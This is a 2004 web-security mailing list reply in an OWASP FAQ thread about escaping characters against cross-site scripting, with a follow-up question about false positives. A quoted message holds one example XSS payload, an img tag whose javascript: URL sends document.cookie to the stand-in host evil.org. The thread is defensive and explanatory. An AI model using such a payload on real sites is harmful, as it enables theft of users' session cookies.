WebApp Sec mailing list archives
Re: AppSec FAQ at OWASP
From: オマル イスマイル <isumai-u () is aist-nara ac jp>
Date: Thu, 29 Jan 2004 22:55:25 +0900
On 2004.1.29, at 06:40 PM, Sangita Pakala wrote:
Thank you Ulf for the nice words. To address your question:Why is it important to escape "(", ")" and "#"?We need to escape these characters to take care of CSS that do not rely on <script> tags. For instance, the "javascript:" construct could be used to embed scripts without using the <script> tag. In the example below, let's say that the user's input is reflected as the value for<img src= >. Now, when the img src= line is encountered, the window.openjavascript function is called and the cookie sent to evil.org <img src="Javascript:window.open('http:// www.evil.org?cookie='+document.cookie)">Escaping the "(" and ")" above renders the function call mute.If someone can point me to a good example for when escaping "#" is reqd,I'd love to hear that. Gunter Ollmann has an excellent article on CSS and special characters at http://www.technicalinfo.net/papers/CSS.html Regards, Sangita. Sangita Pakala Paladion Networks http://www.paladion.net
Sangita, I would like to know that how you deal with the false positive?In the case of " <img src= "javascript: preview(....)> or <img src="javascript:window.close()>..etc..etc.. If you escape the "(" and ")" that means you render out the harmless Javascript too.
Thanks ~~~~~~~~~~~~~~~~00101001~~~~~~~~~~~~~~ Omarjan Ismail Internet Engineering Lab, Graduate School of Information Science Nara Institute of Science and Technology Nara, Japan, 630-0101 Isumai-u () is aist-nara ac jp ~~~~~~~~~~~~~~~00101001~~~~~~~~~~~~~~~~
Current thread:
- AppSec FAQ at OWASP Sangita Pakala (Jan 28)
- <Possible follow-ups>
- RE: AppSec FAQ at OWASP Sangita Pakala (Jan 29)
- RE: AppSec FAQ at OWASP Ulf Härnhammar (Jan 29)
- Re: AppSec FAQ at OWASP オマル イスマイル (Jan 29)
- Re: AppSec FAQ at OWASP Laurian Gridinoc (Jan 30)